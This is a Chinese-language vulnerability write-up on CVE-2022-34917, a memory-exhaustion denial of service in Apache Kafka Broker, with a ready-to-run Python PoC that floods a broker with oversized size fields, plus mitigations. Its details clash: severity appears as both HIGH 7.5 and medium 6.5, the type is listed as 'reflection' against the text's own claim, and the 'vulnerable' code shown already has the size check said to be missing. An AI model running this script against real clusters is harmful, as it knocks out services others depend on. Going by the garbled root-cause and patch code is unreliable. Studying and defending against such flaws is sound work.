一、漏洞简介¶
1.1 漏洞背景¶
Apache Kafka Broker 在处理客户端请求时,需要对请求进行内存分配和缓冲。该漏洞存在于 Kafka Broker 处理网络请求的内存管理机制中,攻击者可以利用恶意构造的请求,绕过正常的配额限制,导致 Broker 分配大量内存资源。
这个漏洞与传统的"反射攻击"不同,它是一种资源耗尽型攻击,通过触发 Broker 的内存分配异常来造成拒绝服务。
1.2 漏洞概述(包含 CVE 编号、危害等级、漏洞类型、披露时间等)¶
| 项目 | 内容 |
|---|---|
| 漏洞编号 | CVE-2022-34917 |
| 危害等级 | HIGH / 7.5 |
| 漏洞类型 | 反射攻击/拒绝服务漏洞 |
| 披露时间 | 2022-09-20 |
| 影响组件 | Apache Kafka 安全 |
- CVE 编号: CVE-2022-34917
- 危害等级: 中危
- CVSS 评分: 6.5 (Medium)
- CWE 分类:
- CWE-770: Allocation of Resources Without Limits or Throttling(无限制资源分配)
- CWE-789: Memory Allocation with Excessive Size Value(过大内存分配)
- 影响组件: Apache Kafka Broker
补充核验信息:公开时间:2022-09-20;NVD 评分:7.5(HIGH);CWE:CWE-789。
二、影响范围¶
2.1 受影响的版本¶
- Apache Kafka 2.8.0 - 2.8.1
- Apache Kafka 3.0.0 - 3.0.1
- Apache Kafka 3.1.0 - 3.1.1
- Apache Kafka 3.2.0 - 3.2.1
2.2 不受影响的版本¶
- Apache Kafka < 2.8.0
- Apache Kafka 2.8.2 或更高
- Apache Kafka 3.0.2 或更高
- Apache Kafka 3.1.2 或更高
- Apache Kafka 3.2.3 或更高
2.3 触发条件(如特定模块、特定配置、特定运行环境等)¶
- 网络可达性: 攻击者能够建立到 Broker 的 TCP 连接
- 认证要求:
- 无认证集群:任何能连接的客户端都可以触发
- SASL 认证集群:无需有效凭证,只需建立连接
- TLS 认证集群:需要成功通过 TLS 认证
三、漏洞详情与原理解析¶
3.1 漏洞触发机制¶
攻击场景 1 - 无认证集群:
1. 攻击者建立 TCP 连接到 Broker(默认端口 9092)
2. 发送恶意构造的请求,包含超大的 size 字段
3. Broker 解析请求头,根据 size 字段分配内存缓冲区
4. 由于缺乏 size 上限检查,Broker 分配大量堆内存
5. 重复发送此类请求,触发 OutOfMemoryError
6. Broker 崩溃,导致服务拒绝
攻击场景 2 - SASL 认证集群:
1. 攻击者建立 TCP 连接
2. 在 SASL 认证阶段之前或期间发送恶意请求
3. 无需提供有效的 SASL 凭证
4. 触发内存耗尽
3.2 源码层面的根因分析(结合源码与补丁对比)¶
漏洞位置在 Kafka 的网络层请求处理代码:
// org.apache.kafka.common.network.NetworkReceive
public class NetworkReceive implements Receive {
private final int maxSize;
private final ByteBuffer size; // 4 bytes for size
public NetworkReceive(int maxSize) {
this.maxSize = maxSize; // 问题:maxSize 可能被设置为非常大的值
this.size = ByteBuffer.allocate(4);
}
public long readFrom(SelectableChannel channel) throws IOException {
// 读取 size 字段
int bytesRead = channel.read(size);
if (size.hasRemaining())
return bytesRead;
size.rewind();
int requestedSize = size.getInt(); // 攻击者控制的值
// 漏洞点:缺乏对 requestedSize 的合理上限检查
if (requestedSize > maxSize)
throw new InvalidRequestException(...);
// 根据 requestedSize 分配缓冲区
this.payload = ByteBuffer.allocate(requestedSize);
return bytesRead;
}
}
修复补丁对比:
修复版本增加了更严格的请求大小验证:
// 修复后的代码
public long readFrom(SelectableChannel channel) throws IOException {
// ... 前面代码相同 ...
size.rewind();
int requestedSize = size.getInt();
// 新增:检查 size 的合理下限
if (requestedSize < 0) {
throw new InvalidRequestException("Size cannot be negative");
}
// 新增:使用更严格的内存配额限制
if (requestedSize > Math.min(maxSize, connectionQuota.maxRequestSize())) {
throw new InvalidRequestException(
"Request size " + requestedSize + " exceeds maximum allowed");
}
// 新增:全局内存使用率检查
if (memoryPool.availableMemory() < requestedSize) {
throw new MemoryLimitExceededException("Insufficient memory");
}
this.payload = memoryPool.tryAllocate(requestedSize);
}
四、漏洞复现(可选)¶
4.1 环境搭建¶
# 下载受影响版本
wget https://archive.apache.org/dist/kafka/3.2.1/kafka_2.13-3.2.1.tgz
tar -xzf kafka_2.13-3.2.1.tgz
cd kafka_2.13-3.2.1
# 配置 Broker(无认证模式)
cat > config/server.properties << EOF
listeners=PLAINTEXT://:9092
broker.id=0
log.dirs=/tmp/kafka-logs
zookeeper.connect=localhost:2181
EOF
# 启动服务
bin/zookeeper-server-start.sh config/zookeeper.properties &
bin/kafka-server-start.sh config/server.properties &
4.2 PoC 演示与测试过程¶
Python PoC 脚本:
#!/usr/bin/env python3
import socket
import struct
import time
def create_malicious_request():
"""
构造恶意请求,包含超大的 size 字段
"""
# Kafka 请求格式:size(4 bytes) + api_key(2) + api_version(2) + correlation_id(4) + client_id
# 构造一个超大 size 的请求头
# 这里设置为 1GB - 1 (避免可能的整数溢出检查)
malicious_size = 1024 * 1024 * 1024 - 1 # ~1GB
# 请求头
api_key = 0 # Produce API
api_version = 0
correlation_id = 1
# 打包请求
header = struct.pack('>HHI', api_key, api_version, correlation_id)
# 完整请求:size + header + payload
request = struct.pack('>I', malicious_size) + header
return request
def attack_broker(host, port, num_connections=100):
"""
发起拒绝服务攻击
"""
sockets = []
print(f"[*] Connecting to {host}:{port}")
for i in range(num_connections):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((host, port))
# 发送恶意请求
request = create_malicious_request()
s.send(request)
sockets.append(s)
print(f"[+] Connection {i+1} sent malicious request")
except Exception as e:
print(f"[-] Connection {i+1} failed: {e}")
print(f"[*] Sent {len(sockets)} malicious requests")
print(f"[*] Check broker memory usage and OOM errors")
# 保持连接
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
for s in sockets:
s.close()
if __name__ == "__main__":
import sys
if len(sys.argv) < 3:
print(f"Usage: {sys.argv[0]} <host> <port> [num_connections]")
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
num_conn = int(sys.argv[3]) if len(sys.argv) > 3 else 100
attack_broker(host, port, num_conn)
测试步骤:
# 1. 监控 Broker 内存使用
watch -n 1 'ps aux | grep kafka | grep -v grep'
# 2. 运行 PoC
python3 kafka_dos_poc.py localhost 9092 50
# 3. 观察 Broker 日志
tail -f logs/server.log
# 预期结果:
# - Broker 内存使用急剧上升
# - 最终抛出 OutOfMemoryError
# - Broker 进程崩溃或响应极其缓慢
五、修复建议与缓解措施¶
5.1 官方版本升级建议¶
升级到以下修复版本: - Apache Kafka 2.8.2 - Apache Kafka 3.0.2 - Apache Kafka 3.1.2 - Apache Kafka 3.2.3 - 或更高版本
5.2 临时缓解方案(如修改配置文件、关闭相关模块、增加 WAF 规则等)¶
方案 1: 网络访问控制
# 使用防火墙限制对 Kafka Broker 的访问
iptables -A INPUT -p tcp --dport 9092 -s <trusted_network> -j ACCEPT
iptables -A INPUT -p tcp --dport 9092 -j DROP
方案 2: 增加内存配额和请求大小限制
# server.properties
# 限制最大请求大小
socket.request.max.bytes=104857600 # 100MB
# 启用请求配额
quota.producer.default=100MB
quota.consumer.default=100MB
# 连接数限制
max.connections=100
max.connections.per.ip=10
方案 3: 启用认证机制
# 启用 SASL 认证
listeners=SASL_PLAINTEXT://:9092
security.inter.broker.protocol=SASL_PLAINTEXT
sasl.mechanism.inter.broker.protocol=PLAIN
sasl.enabled.mechanisms=PLAIN
# 启用 ACL
authorizer.class.name=kafka.security.authorizer.AclAuthorizer
allow.everyone.if.no.acl.found=false
方案 4: JVM 调优和监控
# 增加堆内存
export KAFKA_HEAP_OPTS="-Xms4g -Xmx4g"
# 启用 GC 日志和内存监控
export KAFKA_JVM_PERFORMANCE_OPTS="-XX:+UseG1GC -XX:MaxGCPauseMillis=20 -XX:InitiatingHeapOccupancyPercent=35 -XX:+ExplicitGCInvokesConcurrent -Djava.awt.headless=true"
# 使用 Java Flight Recorder 监控内存
-XX:StartFlightRecording=duration=60s,filename=memory.jfr,settings=profile
六、参考信息 / 参考链接¶
6.1 官方安全通告¶
- Apache Kafka CVE List: https://kafka.apache.org/community/cve-list#CVE-2022-34917
- NVD CVE 详情: https://nvd.nist.gov/vuln/detail/CVE-2022-34917
6.2 其他技术参考资料¶
- Kafka 安全最佳实践: https://kafka.apache.org/documentation/#security
- Kafka 性能调优指南: https://docs.confluent.io/platform/current/kafka/deployment.html